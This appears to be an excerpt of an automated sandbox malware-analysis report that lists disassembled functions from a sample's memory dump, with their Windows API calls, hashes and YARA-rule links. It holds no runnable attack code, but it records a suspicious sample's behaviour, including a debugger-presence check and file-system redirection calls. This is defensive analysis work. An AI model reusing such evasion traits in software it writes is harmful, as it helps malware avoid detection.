Part of subcall function 013B3700: MapVirtualKeyW.USER32(000000A1,00000000), ref: 013B374F
Part of subcall function 013B3700: MapVirtualKeyW.USER32(00000011,00000000), ref: 013B3757
Part of subcall function 013B3700: MapVirtualKeyW.USER32(00000012,00000000), ref: 013B375F

Part of subcall function 013B3768: RegisterWindowMessageW.USER32(00000004,?,013B3AB3), ref: 013B37C0

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 013B3B54
OleInitialize.OLE32 ref: 013B3B72
CloseHandle.KERNEL32(00000000,00000000), ref: 013F3F42

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: fcfa0521e5261cf2fd4ffba4e7cdedd4f29f9578c371f259a1dc74e108a4326c
Instruction ID: 35f0e339b59240e1c9af34aaea3465b9bbc4fa2db1bd965c2853e838e50a9c44
Opcode Fuzzy Hash: fcfa0521e5261cf2fd4ffba4e7cdedd4f29f9578c371f259a1dc74e108a4326c
Instruction Fuzzy Hash: 7E71BDB09912518FD7A8EF7EE5A4E5D7BE4FB68208300822ED50AD7679FBB04445CF20

Uniqueness

Uniqueness Score: -1.00%

Function 013B2F13, Relevance: 4.6, APIs: 3, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 013B2FBA
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001), ref: 013B2FCA

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 63f5bee3f8fd7c4e66579a3fa47f938e771fc0899c05286bd5a2ae43f335a057
Instruction ID: fe125c9e4925ec7373dd3396d28d0f0c602de2f5601d176f951ee7fe4c6741dc
Opcode Fuzzy Hash: 63f5bee3f8fd7c4e66579a3fa47f938e771fc0899c05286bd5a2ae43f335a057
Instruction Fuzzy Hash: 11316D71A00609EFDB14CF6CC880BDABBB5FB44718F148729EA1497644D771FA98CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013CFD8B, Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 013B4C04: Shell_NotifyIconW.SHELL32(00000001,?), ref: 013B4CF4

KillTimer.USER32(?,00000001,?,?), ref: 013CFE14
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 013CFE23
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0140FD62

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: c71560ca8d34df2b72f2ebb5362101e5944109b326918609c9134e3aa3ba9485
Instruction ID: 091a2049ead822f76eac083485914c5b677c55293f810535061e874462a65688
Opcode Fuzzy Hash: c71560ca8d34df2b72f2ebb5362101e5944109b326918609c9134e3aa3ba9485
Instruction Fuzzy Hash: CC31B870904354AFDB33CB359455BEBBBECAF02708F0404AED59E57292C374158ACB11

Uniqueness

Uniqueness Score: -1.00%

Function 013E8ACE, Relevance: 4.6, APIs: 3, Instructions: 61COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,013E89EC,?,01479C30,0000000C), ref: 013E8B24
GetLastError.KERNEL32(?,013E89EC,?,01479C30,0000000C), ref: 013E8B2E
__dosmaperr.LIBCMT ref: 013E8B59

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 4628813ea91b293ff235551d246696e87fa66f14ad2349b7d0dbe424ac4615a2
Instruction ID: 51cf25b7016ff29c7f2a37accdd20eff34f49a2fd9d0af23a2e17fc871ccfa62
Opcode Fuzzy Hash: 4628813ea91b293ff235551d246696e87fa66f14ad2349b7d0dbe424ac4615a2
Instruction Fuzzy Hash: CA014E36E443319BEA35167C584CB7E67CD5F9273CF29019EE9049F1D2DE6084C18350

Uniqueness

Uniqueness Score: -1.00%

Function 013E97AB, Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,013E985A,FF8BC369,00000000,00000002,00000000), ref: 013E97E4
GetLastError.KERNEL32(?,013E985A,FF8BC369,00000000,00000002,00000000,?,013E5F81,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,013D6FF1), ref: 013E97EE
__dosmaperr.LIBCMT ref: 013E97F5

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 8dd3a6eeca91034727a66fecc9f53105968f8bc817afe1a2cf55969204674a52
Instruction ID: e37ccb784b0e7c7a313d45dd51710e1aa2a2f496d3e448a41c9271314bb5c961
Opcode Fuzzy Hash: 8dd3a6eeca91034727a66fecc9f53105968f8bc817afe1a2cf55969204674a52
Instruction Fuzzy Hash: 82014C37610329AFCB159F9DDC08D6F3BAEEB95238B240249F8119B1D0EA70D951C790

Uniqueness

Uniqueness Score: -1.00%

Function 013C3A70, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 013C3D44

Strings

CALL, xrefs: 013C3D14

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 72fcd1781044a4f03d0d9387fe21b7c48d334a4d6722c02b246920e0225e926a
Instruction ID: edf0e25e117a0219f0af3d6ca4db189710e28544a46aa36a7eeab910811b4803
Opcode Fuzzy Hash: 72fcd1781044a4f03d0d9387fe21b7c48d334a4d6722c02b246920e0225e926a
Instruction Fuzzy Hash: 91919AB06042029FDB15DF29C884B5ABBE1FF84718F04C95DE89A5B3A1C731ED55CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 013B2950, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 013F36EF

Part of subcall function 013B50F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,013B5035,?,?,013F4641,?,?,00000100,00000000,00000000,CMDLINE), ref: 013B5117

Part of subcall function 013B32E0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 013B32FF

Strings

X, xrefs: 013F36BD

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 76607166ed3c8c867b5a45491f3cbbee591255ba2b3cde21b443c9cd81a53f2d
Instruction ID: 162447d3993b61dc452950a47941c91918a45965dbc29c6ae00f737abb1dccf8
Opcode Fuzzy Hash: 76607166ed3c8c867b5a45491f3cbbee591255ba2b3cde21b443c9cd81a53f2d
Instruction Fuzzy Hash: 6E21A571A002989BCF15DF98C849BEE7BFCAF59318F00401AD605E7350EBB49989CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013B8340, Relevance: 3.2, APIs: 2, Instructions: 236fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000000,00010000,?,00000000,00000002,?,00000001,?,?,013B82CB,?,?,?), ref: 013B848C
SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000002,?,00000001,?,?,013B82CB,?,?,?), ref: 013F6572

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: ff0deef649b7b6d2e3e19e2a1e02f2786b06f4d8079d8e017fe5b2736ecdc862
Instruction ID: c1e03eb50359e578e67daa0055d0cc55d98cc5a033d4055179b6785a1f1f30a7
Opcode Fuzzy Hash: ff0deef649b7b6d2e3e19e2a1e02f2786b06f4d8079d8e017fe5b2736ecdc862
Instruction Fuzzy Hash: BB9124B4904209EBEF00CF68D8857E9BBB8FF05318F048199EA19AF695E735D941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013B3195, Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,013B1153,?,00008000,0144DBF4), ref: 013B31C3
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,013B1153,?,00008000,0144DBF4), ref: 013F3DC2

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 92b7533270c646b3e9f667477ea5084dbccbf6cc686abc14d0262c4232adef86
Instruction ID: 5069997359272551337b3c3fbfecbc78576a064e770464f74c22f99477489966
Opcode Fuzzy Hash: 92b7533270c646b3e9f667477ea5084dbccbf6cc686abc14d0262c4232adef86
Instruction Fuzzy Hash: DE012931245225B6E7301A6A8C4EF977EA8EF06778F10C214FB99AE1E0DBB45494CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013B28E0, Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 013B2902

Part of subcall function 013B28AB: SystemParametersInfoW.USER32 ref: 013B28C0
Part of subcall function 013B28AB: SystemParametersInfoW.USER32 ref: 013B28D7

Part of subcall function 013B331E: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,013B292D,?), ref: 013B334E
Part of subcall function 013B331E: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,013B292D,?), ref: 013B3361
Part of subcall function 013B331E: GetFullPathNameW.KERNEL32(00007FFF,?,?,01482408,014823F0,?,?,?,?,?,?,013B292D,?), ref: 013B33CD
Part of subcall function 013B331E: SetCurrentDirectoryW.KERNEL32(?,00000001,01482408,?,?,?,?,?,?,?,013B292D,?), ref: 013B344E

SystemParametersInfoW.USER32 ref: 013B293C

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 347d4c88541c75778edbb2f276ab2b8440ed5a28d8e138deda133f9d8ce0165e
Instruction ID: 8d7df628d77a77616feb97e7ff21bde45e5661230050290b5492f276a844c144
Opcode Fuzzy Hash: 347d4c88541c75778edbb2f276ab2b8440ed5a28d8e138deda133f9d8ce0165e
Instruction Fuzzy Hash: 01F05E32640B09AFE730ABB4F899F5D3BA4A720719F004919F6058A5FADBF5A050CB40

Uniqueness

Uniqueness Score: -1.00%

Function 013BB35E, Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0144DBF4,014113AC,00000000,00000000,00000000,?,0144DBF4,0144DBF4,?,013B12BF,0144DBF4,?,?), ref: 013BB37D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,014113AC,00000000,?,00000000,?,0144DBF4,0144DBF4,?,013B12BF,0144DBF4,?,?), ref: 013BB3B3

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 6e88db6f2ebf15546fba95a106c966e2039c9e21bdef29ddef2ea9c628c5ab39
Instruction ID: 0b236c4205fc347d5738463339440de33f1c0be72848252a01f826134ebb68ff
Opcode Fuzzy Hash: 6e88db6f2ebf15546fba95a106c966e2039c9e21bdef29ddef2ea9c628c5ab39
Instruction Fuzzy Hash: C501F7713021047FEB1967B9AC4AFBF7AADDB84740F00007DB606DA1D0EDA09D008620

Uniqueness

Uniqueness Score: -1.00%

Function 013B8600, Relevance: 1.9, APIs: 1, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb92cec65c1ed97fa9395645b8f0f739d85070a3190ecbc3caebf34caa6432ae
Instruction ID: 30b5a1e3009fa6ef237b301963869915b4239a68075a34223e2c61dbbbf2f1e4
Opcode Fuzzy Hash: eb92cec65c1ed97fa9395645b8f0f739d85070a3190ecbc3caebf34caa6432ae
Instruction Fuzzy Hash: 0CF1BEB1D0011A9BDF14DFA8C8C09FEB7B9FF54318F4441AAEA12A7A90F7349A41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 013BC684, Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(013B889C,FE82850F,FE828510,00000001,00000000,?,013B889C,00000001,00000001,?,0142EC97,01482420,?,00000000,0142EC97,00000000), ref: 013BC70D

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 83a3e7c941b2ddd5c6170438eefbb8352f353d44c7af583b7c4839447db2716d
Instruction ID: ff5da8f5992c95c594faa259982c1f6790b6c671c012a5a04d93d78430fc4090
Opcode Fuzzy Hash: 83a3e7c941b2ddd5c6170438eefbb8352f353d44c7af583b7c4839447db2716d
Instruction Fuzzy Hash: 9941F475A001069FCB34CF28C4D5AF977A5FF44758B14512AEB1A8BBA0EB30EC61CB41

Uniqueness

Uniqueness Score: -1.00%

Function 013B2BE0, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 013B320E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,013B2BF2,?,?,013B2B95,?,00000001,?,?,00000000), ref: 013B321A
Part of subcall function 013B320E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 013B322C
Part of subcall function 013B320E: FreeLibrary.KERNEL32(00000000,?,?,013B2BF2,?,?,013B2B95,?,00000001,?,?,00000000), ref: 013B323E

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,013B2B95,?,00000001,?,?,00000000), ref: 013B2C12

Part of subcall function 013B31D7: LoadLibraryA.KERNEL32(kernel32.dll,?,?,013F3B55,?,?,013B2B95,?,00000001,?,?,00000000), ref: 013B31E0
Part of subcall function 013B31D7: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 013B31F2
Part of subcall function 013B31D7: FreeLibrary.KERNEL32(00000000,?,?,013F3B55,?,?,013B2B95,?,00000001,?,?,00000000), ref: 013B3205

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 9537e926ef3c698cf43bd2c6cb14b09c1165752ec09a5f5c4fe8b94033c2b7c7
Instruction ID: 92883eb22dc2b2ac0d73557b5dd8872177ff4a58b84d391e77b97e61f126c14d
Opcode Fuzzy Hash: 9537e926ef3c698cf43bd2c6cb14b09c1165752ec09a5f5c4fe8b94033c2b7c7
Instruction Fuzzy Hash: 2E110835700206ABDF14BF68CC41BEE77A5AF60719F10452DE652AA4D0EA70AA059750

Uniqueness

Uniqueness Score: -1.00%

Function 013B84C0, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,0144DBF4,00000000,?,?,013B2E8C,0144DBF4,00010000,00000000,?,00000000,00000000), ref: 013B851C

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4065322379b6e90c32a6887bc3d121a0f967f6af1d54bc512ffa9198cc3e6c47
Instruction ID: c27f36cdf4059158a394c324b8b6da69a72f9e7bbf0b8e14bca159335aec8134
Opcode Fuzzy Hash: 4065322379b6e90c32a6887bc3d121a0f967f6af1d54bc512ffa9198cc3e6c47
Instruction Fuzzy Hash: D81148312007059FE720CF19D4C0FA6BBE9FF44768F04C46EEAAA8AA51D774E845CB24

Uniqueness

Uniqueness Score: -1.00%

Function 013B45A6, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,013B33F5,01482408,?,?,?,?,?,?,?,013B292D,?), ref: 013B45E7

Part of subcall function 013BB0DB: _wcslen.LIBCMT ref: 013BB0EE

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: FullNamePath_wcslen
String ID:
API String ID: 4019309064-0
Opcode ID: 0849006627f5d1212b35eb1d98302e309d18e562b28f06c3dc859cf2584bdbe2
Instruction ID: f48198806e5452da644db90a3b4c14b8a902fbc131180bf9182cfdc07db6af35
Opcode Fuzzy Hash: 0849006627f5d1212b35eb1d98302e309d18e562b28f06c3dc859cf2584bdbe2
Instruction Fuzzy Hash: 1111CC31A04119D7CB50FBAC9880EDDB7BCBF18258B004056AB49D7554FF70D7848B24

Uniqueness

Uniqueness Score: -1.00%

Function 013DEA22, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b9f836960ab58fccbfac0efb01fc85afbfff16d2c470218f1775939f83e5553
Instruction ID: 982ca742837ca9c3a8f93254600019b820a27c973597d04fa65acb81bf254bae
Opcode Fuzzy Hash: 0b9f836960ab58fccbfac0efb01fc85afbfff16d2c470218f1775939f83e5553
Instruction Fuzzy Hash: 7AF02833500B275AEA323A6DAC08A5B3BDCAF5233DF004B35E5259A1D0CB70D40286E3

Uniqueness

Uniqueness Score: -1.00%

Function 013BC110, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 013BC11A

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: d0f0a7a5b65c044202c3a1584fdf6f2f399c1bcc717f1e807a3e41b658e7e8b5
Instruction ID: 55f182ff1383cc89b232628c4dbd5dfa0d4615000a0a10e7036a29d523378756
Opcode Fuzzy Hash: d0f0a7a5b65c044202c3a1584fdf6f2f399c1bcc717f1e807a3e41b658e7e8b5
Instruction Fuzzy Hash: B0F0C8B36016057ED7149F3DEC05AA6BF98EB54764F10812AF719CB5D0EB31E510C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 013E3C40, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?,?,013D0215,00000000,?,013B8E5F,00000004,?,013F4C6B,?,?,013B10E8,0144DBF4), ref: 013E3C72

Memory Dump Source

Source File: 00000008.00000002.229320904.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000008.00000002.229315655.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229499261.000000000144D000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229548328.0000000001473000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.229563682.000000000147D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.229576135.0000000001485000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_13b0000_Male.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 997fb198d9d9c8d1f80e459321f733e97a1fb87e5766ae4d04b294135fcd8a20
